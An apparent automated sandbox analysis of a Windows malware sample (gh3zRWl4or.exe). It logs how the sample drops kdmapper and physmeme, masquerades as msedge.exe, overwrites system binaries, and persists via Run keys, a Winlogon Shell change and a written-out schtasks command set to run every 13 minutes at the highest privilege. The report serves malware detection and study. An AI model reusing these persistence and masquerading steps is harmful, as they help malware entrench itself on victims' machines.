                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000006.00000000.1351838623.0000000000653000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: ;C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.pdb source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: System.Windows.Forms.pdb source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.2229912737.000000001AE15000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: msedge.exe, 00000036.00000002.1978196231.00000000010C0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Administrator\Desktop\Ghosty\build\usermode\usermode.pdb source: gh3zRWl4or.exe
                                Source: Binary string: em.pdb source: msedge.exe, 00000036.00000002.2118185806.000000001B611000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Administrator\Desktop\Ghosty\build\usermode\usermode.pdb66 source: gh3zRWl4or.exe
                                Source: Binary string: m.pdb source: msedge.exe, 00000036.00000002.2118185806.000000001B580000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000008.00000003.1365070939.000001D6FD270000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364865814.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364609974.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364788311.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.8.dr
                                Source: Binary string: stem.pdbpdbtem.pdb source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.2229912737.000000001AE15000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 5ye\obj\Release\Fcs.pdb source: curl.exe, 00000008.00000003.1364788311.000001D6FD2B4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.pdb source: msedge.exe, 00000036.00000002.1978196231.00000000010C0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ;C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.pdb source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp
                                Source: gh3zRWl4or.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: gh3zRWl4or.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: gh3zRWl4or.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: gh3zRWl4or.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: gh3zRWl4or.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"Jump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174760
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\__tmp_rar_sfx_access_check_5929781Jump to behavior
                                Source: kdmapper.exe.5.drStatic PE information: section name: .didat
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063F640 push ecx; ret 6_2_0063F653
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063EB78 push eax; ret 6_2_0063EB96
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00440905 push ecx; retf 12_2_00440906
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00452DD9 push eax; retf 12_2_004534E2
                                Source: C:\Edge\msedge.exeCode function: 16_2_00007FFAAC304B92 pushad ; retf 16_2_00007FFAAC304B95
                                Source: C:\Edge\msedge.exeCode function: 16_2_00007FFAAC6F8B28 push eax; ret 16_2_00007FFAAC6F8B29
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFAAC1FD2A5 pushad ; iretd 29_2_00007FFAAC1FD2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFAAC3E2316 push 8B485F94h; iretd 29_2_00007FFAAC3E231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFAAC20D2A5 pushad ; iretd 30_2_00007FFAAC20D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFAAC3F2316 push 8B485F93h; iretd 30_2_00007FFAAC3F231B
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC324B92 pushad ; retf 35_2_00007FFAAC324B95
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC357A05 push eax; iretd 35_2_00007FFAAC357A4D
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC3579C5 push eax; iretd 35_2_00007FFAAC357A4D
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC33967D push edi; ret 35_2_00007FFAAC339688
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC338AC3 push ss; iretd 35_2_00007FFAAC338AC9
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC367A05 push eax; iretd 37_2_00007FFAAC367A4D
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC3679C5 push eax; iretd 37_2_00007FFAAC367A4D
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC34967D push edi; ret 37_2_00007FFAAC349688
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC348AC3 push ss; iretd 37_2_00007FFAAC348AC9
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC334B92 pushad ; retf 37_2_00007FFAAC334B95
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC728B28 push eax; ret 37_2_00007FFAAC728B29
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC314B92 pushad ; retf 38_2_00007FFAAC314B95
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC32967D push edi; ret 38_2_00007FFAAC329688
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC328AC3 push ss; iretd 38_2_00007FFAAC328AC9
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC347A05 push eax; iretd 38_2_00007FFAAC347A4D
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC3479C5 push eax; iretd 38_2_00007FFAAC347A4D
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC334B92 pushad ; retf 39_2_00007FFAAC334B95
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC367A05 push eax; iretd 39_2_00007FFAAC367A4D
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC3679C5 push eax; iretd 39_2_00007FFAAC367A4D
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC34967D push edi; ret 39_2_00007FFAAC349688
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC348AC3 push ss; iretd 39_2_00007FFAAC348AC9
                                Source: msedge.exe.6.drStatic PE information: section name: .text entropy: 7.556050087022216
                                Source: physmeme.exe.8.drStatic PE information: section name: .text entropy: 7.9965850430662675
                                Source: LBUPSPkYsNXrxZEtdVzCng.exe.16.drStatic PE information: section name: .text entropy: 7.556050087022216

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeExecutable created and started: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeExecutable created and started: C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\aowVPJEW.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\fnSuHmrC.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\BegQTYoT.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\uNKjQhPt.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\ZcXEVMnO.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\XkTUfoHN.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\msedge.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\OPvxZeSl.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\ASIzYbXK.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\sozKoiId.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\HiOQLkRz.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\KAbPIEds.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\vpYzbqhQ.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\dZblWXPP.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\TqIVmuJi.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\xSuJhsEU.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\OPvxZeSl.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\XkTUfoHN.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\HiOQLkRz.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\vpYzbqhQ.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\fnSuHmrC.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\uNKjQhPt.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\dZblWXPP.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\TqIVmuJi.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\BegQTYoT.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile created: C:\Users\user\Desktop\aowVPJEW.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\xSuJhsEU.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\KAbPIEds.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\ASIzYbXK.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\sozKoiId.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\ZcXEVMnO.logJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCngJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCngJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCngJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
